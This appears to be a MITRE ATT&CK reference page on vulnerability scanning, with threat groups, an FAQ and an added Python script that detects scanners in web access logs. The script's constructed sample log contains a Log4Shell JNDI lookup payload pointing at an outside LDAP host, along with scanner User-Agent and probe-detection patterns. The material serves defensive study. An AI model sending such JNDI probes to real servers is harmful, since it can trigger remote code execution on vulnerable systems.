Description
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).
Platforms
PRE
Mitigations (1)
M1056 Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Threat Groups (14)
| ID | Group | Context |
|---|---|---|
| G0034 | Sandworm Team | [Sandworm Team](https://attack.mitre.org/groups/G0034) has scanned network infrastructure for vulnerabilities as part of its operational planning.(Cit... |
| G0123 | Volatile Cedar | [Volatile Cedar](https://attack.mitre.org/groups/G0123) has performed vulnerability scans of the target server.(Citation: CheckPoint Volatile Cedar Ma... |
| G0065 | Leviathan | [Leviathan](https://attack.mitre.org/groups/G0065) has conducted reconnaissance against target networks of interest looking for vulnerable, end-of-lif... |
| G1003 | Ember Bear | [Ember Bear](https://attack.mitre.org/groups/G1003) has used publicly available tools such as MASSCAN and Acunetix for vulnerability scanning of publi... |
| G0096 | APT41 | [APT41](https://attack.mitre.org/groups/G0096) used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as t... |
| G0139 | TeamTNT | [TeamTNT](https://attack.mitre.org/groups/G0139) has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.(Ci... |
| G0007 | APT28 | [APT28](https://attack.mitre.org/groups/G0007) has performed large-scale scans in an attempt to find vulnerable servers.(Citation: TrendMicro Pawn Sto... |
| G0059 | Magic Hound | [Magic Hound](https://attack.mitre.org/groups/G0059) has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 ... |
| G1055 | VOID MANTICORE | [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has scanned victim environments for susceptibility to vulnerability exploitation.(Citation: DO... |
| G0016 | APT29 | [APT29](https://attack.mitre.org/groups/G0016) has conducted widespread scanning of target environments to identify vulnerabilities for exploit.(Citat... |
| G1035 | Winter Vivern | [Winter Vivern](https://attack.mitre.org/groups/G1035) has used remotely-hosted instances of the Acunetix vulnerability scanner.(Citation: SentinelOne... |
| G0143 | Aquatic Panda | [Aquatic Panda](https://attack.mitre.org/groups/G0143) has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE ... |
| G0035 | Dragonfly | [Dragonfly](https://attack.mitre.org/groups/G0035) has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.(Citation: CISA ... |
| G1006 | Earth Lusca | [Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMic... |
Frequently Asked Questions
What is T1595.002 (Vulnerability Scanning)?
T1595.002 is a MITRE ATT&CK technique named 'Vulnerability Scanning'. It belongs to the Reconnaissance tactic. Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) pot...
How can T1595.002 be detected?
Vulnerability scanning happens before compromise and largely outside the victim's visibility, so detection is difficult and noisy. Monitor for network traffic indicative of scanning, such as large volumes of requests or connection attempts from a single source (especially a source associated with a known adversary or botnet), and review web server metadata such as User-Agent and Referer strings for scanner artifacts. Much of this activity has a very high occurrence and false-positive rate, so detection efforts are often better spent on adjacent stages of the adversary lifecycle, such as Initial Access (ex: Exploit Public-Facing Application).
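The following script is an added example, not part of the MITRE ATT&CK entry or of this page's original content. It applies the three signals described above to web-server access logs in Combined Log Format: a known scanner User-Agent fragment, a JNDI lookup string of the kind used to probe for CVE-2021-44228, and burst behaviour (many distinct paths with a high 4xx/5xx share from one source inside a short window). The log lines, the scanner User-Agent list and the thresholds are constructed assumptions for illustration and should be tuned per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (Combined Log Format); not real traffic.
# 203.0.113.7 browses normally, 198.51.100.23 runs Nikto, 192.0.2.44 sends a
# Log4Shell-style JNDI probe in its User-Agent, 198.51.100.77 sweeps well-known
# paths behind a browser User-Agent.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"
203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"
198.51.100.23 - - [10/Mar/2024:12:00:05 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 162 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
198.51.100.23 - - [10/Mar/2024:12:00:05 +0000] "GET /.env HTTP/1.1" 404 162 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)"
198.51.100.23 - - [10/Mar/2024:12:00:06 +0000] "GET /admin/ HTTP/1.1" 404 162 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000003)"
198.51.100.23 - - [10/Mar/2024:12:00:06 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 162 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000004)"
198.51.100.23 - - [10/Mar/2024:12:00:07 +0000] "GET /server-status HTTP/1.1" 403 199 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000005)"
192.0.2.44 - - [10/Mar/2024:12:01:10 +0000] "GET /login HTTP/1.1" 200 900 "-" "${jndi:ldap://192.0.2.44:1389/a}"
198.51.100.77 - - [10/Mar/2024:12:02:00 +0000] "GET /wp-login.php HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
198.51.100.77 - - [10/Mar/2024:12:02:02 +0000] "GET /xmlrpc.php HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
198.51.100.77 - - [10/Mar/2024:12:02:04 +0000] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
198.51.100.77 - - [10/Mar/2024:12:02:07 +0000] "GET /actuator/health HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
198.51.100.77 - - [10/Mar/2024:12:02:09 +0000] "GET /owa/ HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
198.51.100.77 - - [10/Mar/2024:12:02:11 +0000] "GET /console HTTP/1.1" 200 300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0"
"""

# Combined Log Format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Illustrative User-Agent fragments of common scanners (assumption: an incomplete list;
# many scanners, Acunetix included, can be configured to spoof a browser User-Agent).
SCANNER_UA = ("nikto", "acunetix", "nessus", "openvas", "sqlmap", "nuclei", "masscan", "nmap", "zgrab")

# Lookup string used to probe for CVE-2021-44228 (Log4Shell); matched in any request field.
JNDI_RE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_scanners(log_text, window=timedelta(seconds=60), min_requests=5,
                    min_distinct_paths=5, error_ratio=0.6):
    """Return {source_ip: sorted reasons} for sources whose traffic looks like scanning.

    Burst rule: within `window`, at least `min_requests` requests to at least
    `min_distinct_paths` distinct paths, of which a share >= `error_ratio` returned 4xx/5xx.
    Thresholds are assumptions; tune them against a baseline of your own traffic.
    """
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        reasons = set()
        recs.sort(key=lambda r: r["ts"])
        for rec in recs:
            ua = rec["ua"].lower()
            for frag in SCANNER_UA:
                if frag in ua:
                    reasons.add(f"scanner user-agent fragment: {frag}")
            for field in ("path", "referer", "ua"):
                if JNDI_RE.search(rec[field]):
                    reasons.add(f"jndi lookup in {field} (CVE-2021-44228 probe)")
        # Sliding window anchored at each request; O(n^2) per source is fine for an example.
        for i, start in enumerate(recs):
            burst = [rec for rec in recs[i:] if rec["ts"] - start["ts"] <= window]
            if len(burst) < min_requests:
                continue
            paths = {rec["path"] for rec in burst}
            errors = sum(1 for rec in burst if rec["status"] >= 400)
            if len(paths) >= min_distinct_paths and errors / len(burst) >= error_ratio:
                reasons.add(f"burst: {len(burst)} requests, {len(paths)} paths, "
                            f"{errors} errors within {int(window.total_seconds())}s")
                break
        if reasons:
            findings[ip] = sorted(reasons)
    return findings


if __name__ == "__main__":
    for ip, reasons in detect_scanners(SAMPLE_LOG).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The browsing client is not reported; Nikto trips both the User-Agent and burst rules; the JNDI probe is caught from a single request regardless of volume; and the sweep behind a Chrome User-Agent is caught by the burst rule alone, which is the case the User-Agent list cannot cover. As the FAQ answer notes, the burst rule will also fire on legitimate crawlers and misconfigured clients, so its output is a triage queue, not a verdict.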
What mitigations exist for T1595.002?
There is 1 documented mitigation for T1595.002: Pre-compromise (M1056). Because scanning takes place outside the enterprise's own defenses, the mitigation is to minimize the amount and sensitivity of information exposed to external parties rather than to block the scans themselves.
Which threat groups use T1595.002?
Known threat groups using T1595.002 include: Sandworm Team, Volatile Cedar, Leviathan, Ember Bear, APT41, TeamTNT, APT28, Magic Hound, VOID MANTICORE, APT29, Winter Vivern, Aquatic Panda, Dragonfly, and Earth Lusca.